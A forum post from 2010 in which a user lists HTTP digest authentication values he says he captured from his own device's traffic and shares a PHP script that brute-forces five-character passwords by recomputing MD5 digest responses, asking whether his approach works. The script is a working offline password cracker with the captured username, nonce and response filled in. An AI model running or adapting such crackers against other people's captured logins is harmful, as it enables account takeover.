Digest access authentication password crack?

The fear of every surveillance society: citizens protecting their own privacy with strong cryptography

Digest access authentication password crack?

Post by EpicFailer on Sat Oct 30, 2010 1:44 pm
([msg=48342]see Digest access authentication password crack?[/msg])

Hi, thanks for taking the time to read my post.

I performed a packet capture to discover that one of my devices are communicating with a certain server using digest access authentication.
I extracted all the information from the packet capture that I could, and I'm hoping to be able to crack the password.

Here is the information I managed to extract:
username: c7y-basic01
realm: c7y-basic
noonce: 7abeoDCRBAA=e1ad0db74fb39c54879161a7bc8d9276e38482bc
uri: /basic_view/func/get_profile
nc: 00000001
cnonce: 1f04bb201d972929cd468ccd1c9eb530
response: b7898d100de332566faf2b926ce167b
qop: auth


And from what I understand, digest authentication works like this (for this particular application):
HA1 = MD5(username:realm:password)
HA2 = MD5(digestURI)
response = MD5(HA1:noonce:nonceCount:clientNonce:qop:HA2)


It looks to me as I have all the value that I need except for the password, so I figured it would be possible to perform a brute force attack and check the brute response against the real response.

I've created a script using php, which I'm running in a shell currently trying to crack the password, but I have no idea how long the password is, so I don't know if it's working until I find the password.
So while I'm spending my days trying to crack this, I figured I should come and ask some hackers who actually know what they're talking about.

So I would highly appreciate it if someone could tell me whether I'm on the right lines to cracking this password, and if not, what I can do to fix it.

Thanks for all your help!

Here is the script i'm using to try and crack the password (please note, it's not all my work, I grabbed a permulation script off the internet to save time).
Code: Select all
<?php
permutations("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",5);
echo "Password not found.";


function permutations($letters,$num){
    $last = str_repeat($letters[0],$num);
    while($last != str_repeat(lastchar($letters),$num)){
        $last = char_add($letters,$last,$num-1);
      checkPWD($last);
    }
}
function char_add($digits,$string,$char){
    if($string[$char] <> lastchar($digits)){
        $string[$char] = $digits[strpos($digits,$string[$char])+1];
        return $string;
    }else{
        $string = changeall($string,$digits[0],$char);
        return char_add($digits,$string,$char-1);
    }
}
function lastchar($string){
    return $string[strlen($string)-1];
}
function changeall($string,$char,$start = 0,$end = 0){
    if($end == 0) $end = strlen($string)-1;
    for($i=$start;$i<=$end;$i++){
        $string[$i] = $char;
    }
    return $string;
}

function checkPWD($password) {
   echo "Checking: $password\r\n";
   $HA1 = MD5("c7y-basic01:c7y-basic:$password");
   $HA2 = MD5("GET:/basic_view/func/get_profile");
   
   $md5 = "$HA1:7abeoDCRBAA=e1ad0db74fb39c54879161a7bc8d9276e38482bc:00000001:1f04bb201d972929cd468ccd1c9eb530:auth:$HA2";
   
   $response = MD5($md5);
   
   $toMatch = "2b7898d100de332566faf2b926ce167b";
   
   if ($response == $toMatch) {
      echo "Password is: $password";
      exit;
   }
}

?>
User avatar
EpicFailer
New User
New User
 
Posts: 9
Joined: Thu Feb 18, 2010 9:38 am
Blog: View Blog (0)


Return to Crypto

Who is online

Users browsing this forum: No registered users and 0 guests

cron